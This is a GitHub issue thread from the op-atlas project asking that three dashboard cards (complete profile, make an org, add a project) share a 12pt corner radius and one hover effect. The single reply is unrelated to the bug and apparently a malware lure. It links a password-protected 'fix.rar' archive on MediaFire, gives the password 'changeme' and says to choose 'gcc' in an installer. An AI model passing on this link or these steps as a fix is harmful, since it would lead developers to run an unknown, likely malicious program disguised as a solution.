### ISSUE TITLE
Profile cards should be styled consistently

### ISSUE THREAD

**Issue by shaunop** [voteagora/op-atlas#214]
**NOT A P0**

**Describe the bug**
The cards 1) complete your profile 2)make an org 3)add a project should have the same corner radius and hover effect. Currently the three cards vary. 

**To Reproduce**

1. Go to dashboard for a new user (no orgs or projects yet added)

**Expected behavior**
All three cards should be styled consistently. 

For hover effect: Use the "add your first project" card as the model 
For corner radius: All cards should have 12pt radius.

**Screenshots**
<img width="600" alt="Screenshot 2024-08-26 at 9 20 56 AM" src="https://github.com/user-attachments/assets/3f24ec58-4a4d-4291-b7ea-4f9fe4d4c6a6">

**Desktop (please complete the following information):**

- OS: macOS
- Browser: Chrome
- Version 14.6

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
